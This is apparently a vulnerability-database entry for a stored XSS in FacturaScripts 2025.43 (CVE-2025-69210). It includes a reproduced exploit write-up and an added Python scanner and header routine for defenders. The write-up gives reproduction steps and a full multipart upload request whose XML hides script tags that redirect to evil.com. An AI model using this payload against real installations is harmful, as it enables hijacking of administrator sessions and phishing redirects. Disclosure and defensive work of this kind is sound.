FacturaScripts 2025.43 - XSS
FacturaScripts version 2025.43 is affected by a cross-site scripting (XSS) vulnerability. An exploit has been published in Perl. The vulnerability is classified as medium severity. No patch or official remediation information is available at this time.
AI Analysis
Technical Summary
This threat concerns an XSS vulnerability in FacturaScripts 2025.43. The vulnerability allows injection of malicious scripts into web pages viewed by other users. Exploit code is publicly available in Perl. No affected versions list or patch information is provided, and the service is not cloud-hosted.
Potential Impact
Successful exploitation of this XSS vulnerability could allow an attacker to execute arbitrary scripts in the context of the affected web application, potentially leading to session hijacking, defacement, or other client-side attacks. However, no evidence of exploitation in the wild is reported.
Mitigation Recommendations
Patch status is not yet confirmed; check the vendor advisory for current remediation guidance. Until an official fix is available, users should apply standard XSS mitigations such as input validation and output encoding where possible.
Indicators of Compromise
- exploit-code:

# Exploit Title: FacturaScripts 2025.43 - XSS
# Date: 30-12-2025
# Exploit Author: VETTRIVEL U
# Author Profile: https://www.linkedin.com/in/vettrivel2006
# Vendor Homepage: https://facturascripts.com/
# Software Link: https://github.com/NeoRazorX/facturascripts
# Affected Versions: <= 2025.4, = 2025.11, = 2025.41, = 2025.43
# Fixes: https://github.com/NeoRazorX/facturascripts/commit/e908ade21c84bdc9d51190057482316730c66146
# Patched Releases: https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.7
# Tested on: Windows
# GitHub Advisories: https://github.com/advisories/GHSA-2267-xqcf-gw2m
# CVE Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69210
# CVE: CVE-2025-69210
----------------------------------------------------------------------------------------
## Description
A stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed.
Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session.
----------------------------------------------------------------------------------------
## Steps to Reproduce
1. Log in as a normal user.
2. Navigate to the Warehouse → Products section: http://localhost:8888/ListProducto
3. Click New Product, enter the details (example below), and save:
   Product Reference: XSS POC
   Description: Stored XSS PoC
4. Go to the Files section of the product.
5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite.
6. Modify the intercepted request body and inject the following payload as the uploaded XML file:

POST /EditProducto?code=10 HTTP/1.1
Host: localhost:8888
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPU65l8Am0L64rWdo
Cookie: [authenticated session cookies]

------ ------WebKitFormBoundaryPU65l8Am0L64rWdo
Content-Disposition: form-data; name="new-files[]"; filename="xss.xml"
Content-Type: text/xml

<html>
<head></head>
<body>
<something:script xmlns:something=" <something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) { top.location.href = "https://evil.com"; }
</something:script>
<a:script xmlns:a=" <a:script xmlns:a="http://www.w3.org/1999/xhtml">
alert("XSS");
if (confirm("Now Redirect POC")) { location.href = "https://evil.com"; }
</a:script>
<info>
<name>
<value>
<![CDATA[ <script> alert("XSS"); if (confirm("Now Redirect POC")) { window.location = "https://evil.com"; } </script> ]]>
</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
------ ------WebKitFormBoundaryPU65l8Am0L64rWdo--

7. Forward the request and save the product file.
8. Open the uploaded file using the generated file URL, for example:
   http://localhost:8888/MyFiles/2025/12/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9
   Observe that:
   - A popup with the message “XSS” is displayed.
   - Upon clicking OK, the browser redirects to an attacker-controlled domain.
----------------------------------------------------------------------------------------
## Impact
- Arbitrary JavaScript execution in the victim’s browser.
- Products created by normal users are visible to administrators. When an admin opens the malicious file, the payload executes in the admin’s session.
- Phishing & Redirect Abuse: Attackers can redirect victims to malicious domains.
- If extended, this vulnerability could be chained with:
  - Session hijacking
  - CSRF token theft
  - Admin API abuse
- Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization.
## Reference
https://github.com/vettrivel007/CVE-Disclosures/blob/main/CVE-2025-69210.md
https://github.com/advisories/GHSA-2267-xqcf-gw2m
## Author Details:
Exploit Author: VETTRIVEL U
Author Profile: https://www.linkedin.com/in/vettrivel2006
GitHub Profile: https://github.com/vettrivel007/
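The advisory's root cause is a stored upload that the application later serves in its own origin without content-type enforcement, so a browser treats the "XML" as XHTML and runs the script it carries. The following is an added example written for this page, not FacturaScripts code and not the referenced fix commit, showing the two defender-side controls that close that gap in any web application: response headers that force stored uploads to download (and forbid MIME sniffing) instead of rendering inline, and a pre-storage scan that flags XML/XHTML uploads carrying script elements, event-handler attributes, `javascript:` URLs, or `<script>` markup hidden in CDATA. The allow-list of inline-safe types, the constructed sample upload, and all function names are assumptions for the demonstration.

```python
"""
Defensive checks for user-uploaded files served back by a web application.

Added example, not FacturaScripts code. Two independent controls:
  1. response_headers_for_upload(): headers that stop a stored upload from
     being rendered as active content in the site's origin.
  2. find_active_content(): a scan run before the upload is stored, so files
     carrying script vectors can be rejected or quarantined.
"""
import re
# Assumption: the stdlib parser is used here for a stand-alone demo; in
# production parse untrusted XML with defusedxml.ElementTree instead.
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Assumed allow-list of types a browser may render inline without executing
# script; everything else (text/xml, text/html, image/svg+xml, ...) is forced
# to download as an opaque blob.
INLINE_SAFE_TYPES = {"image/png", "image/jpeg", "image/gif", "application/pdf", "text/plain"}

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
JS_URL = re.compile(r"^\s*javascript\s*:", re.IGNORECASE)


def response_headers_for_upload(declared_type: str, filename: str) -> dict:
    """Build the headers for serving one stored upload back to a browser."""
    content_type = declared_type.lower().split(";")[0].strip()
    # Filenames are user-controlled; strip anything that could break the header.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    headers = {
        # The browser must not second-guess the declared type.
        "X-Content-Type-Options": "nosniff",
        # Even if something is rendered, it gets no script and no origin.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    if content_type in INLINE_SAFE_TYPES:
        headers["Content-Type"] = content_type
        headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    return headers


def find_active_content(xml_bytes: bytes) -> list:
    """Return human-readable findings for script vectors in an XML/XHTML file.

    An empty list means nothing was found, not that the file is safe; the
    header control above is what actually prevents execution.
    """
    findings = []
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); reject"]
    for elem in root.iter():
        tag = elem.tag
        ns = tag[1:].split("}", 1)[0] if tag.startswith("{") else ""
        local = tag.split("}", 1)[1] if "}" in tag else tag
        # Namespace-prefixed variants (x:script xmlns:x=XHTML) resolve to the
        # same element as a plain <script> once the XHTML namespace is applied.
        if local.lower() == "script":
            findings.append(f"script element (namespace {ns or 'none'})")
        for attr, value in elem.attrib.items():
            if EVENT_ATTR.match(attr):
                findings.append(f"event handler attribute {attr} on <{local}>")
            elif JS_URL.match(value):
                findings.append(f"javascript: URL in attribute {attr} on <{local}>")
        # ElementTree hands CDATA back as plain text; a <script> tag inside it
        # becomes live markup if the file is ever served as HTML.
        for text in (elem.text, elem.tail):
            if text and SCRIPT_TAG.search(text):
                findings.append(f"script markup in text of <{local}>")
    return findings


# Constructed sample upload for the demo (not the advisory's payload).
SAMPLE_UPLOAD = b"""<html xmlns="http://www.w3.org/1999/xhtml">
<body>
  <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
  <a href="javascript:alert(2)" onclick="alert(3)">link</a>
  <info><name><value><![CDATA[<script>alert(4)</script>]]></value></name></info>
</body>
</html>"""

if __name__ == "__main__":
    for finding in find_active_content(SAMPLE_UPLOAD):
        print("REJECT:", finding)
    for k, v in response_headers_for_upload("text/xml", "xss.xml").items():
        print(f"{k}: {v}")
```

The two controls are deliberately independent: the scan catches the vectors known today and gives the upload handler something to log and alert on, while the `attachment` disposition plus `nosniff` means that a file the scan missed is still never executed in the application's origin when an administrator clicks it.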
Technical Details
- Edb Id: 52517
- Has Exploit Code: true
- Code Language: perl
Threat ID: 69f1f0fdcbff5d8610047e62
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:53:35 AM
Last updated: 4/30/2026, 3:48:54 AM